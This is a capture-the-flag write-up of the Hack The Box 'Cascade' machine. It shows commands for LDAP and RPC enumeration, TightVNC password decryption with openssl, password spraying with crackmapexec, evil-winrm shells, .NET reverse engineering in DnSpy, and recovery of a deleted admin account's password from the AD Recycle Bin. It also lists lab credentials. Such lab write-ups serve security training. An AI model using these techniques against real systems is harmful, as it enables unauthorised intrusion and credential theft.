HTB | Cascade — Reverse Engineering - DnSpy and AD Recycle
HTB | Cascade — Reverse Engineering - DnSpy and AD Recycle
This is the Box on Hack The Box Active Directory 101 Track. Find the box here.
You can find the Video Walkthrough here
Skill Learned
- TightVNC Password Extraction
- Active Directory Enumeration
- Reverse Engineering — DnSpy
- AD Recycle Bin
NMAP
IP: 10.10.10.182
nmap -sT -p- --min-rate 10000 10.10.10.182
nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,49154,49155,49157,49158,49165 10.10.10.182 -Pn
SMB & RPC
SMBMAP and SMBClient are not working
smbmap -H 10.10.10.182
Let’s try rpcclient
rpcclient -U "" -N 10.10.10.182
I will copy the users
Let’s see groups
LDAP — TCP 389
To enumerate LDAP, first I’ll get the naming context:
ldapsearch -H ldap://10.10.10.182 -x -s base namingcontexts
I will dump all the info in a file:
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-anonymous
And Now I will look for valuable information While looking in the file I found a password for Ryan
Since it is a base64 I can decode it
Foothold/shell
Let’s check the cred for Winrm and smb
SMB is possible but winrm is not
smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva
Since we have Read Only on soe shares let’s take a look
There are many files in each of the shares I have access to. I use the following commands to just pull all the files in each share (Data for example):
mask ""
recurse ON
prompt OFF
mget *
There are 5 folders
We found some files in the IT folder
find IT/ -type f
On opening the Meeting Notes we found
According to the mail We have to keep an eye out for the admin account password and TempAdmin.
Let’s cat the VNC Install.reg
The line “Password”=hex:6b,cf,2a,4b,6e,5a,ca,0f jumped out as interesting.
Crack TightVNC Password
This GitHub repo guides us to decrypt the VNC password using msfconsole
There was another way shown in the repo
echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
Now That we have the password let’s try it with SMB and WinRM.
Winrm worked
crackmapexec winrm 10.10.10.182 -u s.smith -p sT333ve2
I’ll use Evil-WinRM to get a shell:
evil-winrm -i 10.10.10.182 -u s.smith -p 'sT333ve2'
and we are in. found user.txt
Priv Esc
s.smith is a member of the Audit Share group:
net user s.smith
Since it is not a standard Microsoft group, let’s check
net localgroup "Audit Share"
s.smith is the only user in the group, but the comment has a useful hint to look at this share. There’s a c:\shares, but I don’t have permission to list the directories in it:
however, I can cd into Shares\Audit based on the name from the comment
Since I have access to Audit Share:
smbmap -H 10.10.10.182 -u s.smith -p 'sT333ve2'
I will copy all the files to my local system
We found an Audit.db file
Let’s dump the tables using sqlite3
Nothing jumped out as particularly interesting. I thought the Ldap table could have had a password in it, but the base64-encoded data didn’t decode to ASCII. Perhaps it’s encrypted somehow.
CascAudit.exe & DnSpy
RunAudit.bat shows that CascAudit.exe is run with the DB file as an argument:
It’s a .NET binary
Download DnSpy and load the exe on it
It opens an SQLite connection to the database passed as an arg, reading from the LDAP table, and decrypting the password.
I decided to recover the plaintext password by debugging. I put a breakpoint on line 53 where the SQL connection is closed. Then I went Debug -> Start Debugging, and set the Arugument to where I had a copy of the Audit.db:
Note: Copy all the files including SQLite dll files to Windows before starting the debug
On hitting OK, it runs to the breakpoint, and I can see the decrypted password in the Locals window:
Based on the line in the SQLite DB, this password, w3lc0meFr31nd, likely pairs with the account arksvc.
Let’s try this password for WinRM crackmapexec shows that not only does the password works:
Had I not known the account that was associated with this password, I could have used crackmapexec with a list of users(list that we git from rpcclient):
crackmapexec winrm 10.10.10.182 -u user.txt -p w3lc0meFr31nd --continue-on-success
and we are in
from whoami /groups we can see arksvc is a part of AD Recycle
AD Recycle
AD Recycle Bin is a well-known Windows group. Active Directory Object Recovery (or Recycle Bin) is a feature added in Server 2008 to allow administrators to recover deleted items just like the recycle bin does for files. The linked article gives a PowerShell command to query all of the deleted objects within a domain:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
The last one is really interesting, because it’s the temporary administrator account mentioned in the old email I found earlier (which also said it was using the same password as the normal admin account).
I can get all the details for that account:
Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *
Immediately cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz jumps out. It decodes to baCT3r1aN00dles:
using this password for the administrator account and we are in
and we have root.txt
If you enjoyed this article and want to dive deeper into cybersecurity topics, feel free to explore my detailed write-ups on GitBook. I cover a range of topics including vulnerability assessments, penetration testing techniques, and security methodologies.
? Check out my GitBook for more insights
? Watch my videos on YouTube: AnuragSec
Stay tuned for more content, and don’t forget to follow for future updates!
HTB | Cascade — Reverse Engineering - DnSpy and AD Recycle was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
目录
最新
- Docker/Kubernetes (K8s)Penetration Testing Checklist
- TryHackme’s Advent of Cyber 2024 — Day 03 Writeup
- Tricky & Simple EXIF protection Bypass
- Critical Bug: Deny Sign-In & Steal Sensitive Info on Behalf of Victims
- All UPI IDs in India have Predictable Patterns that allow the disclosure of mail IDs
- How to Threat Model: A Guide to Effectively Mapping your Attack Surface
- Web Cache Poisoning: WWWWWH?
- TryHackme’s Advent of Cyber 2024 — Day 02 Writeup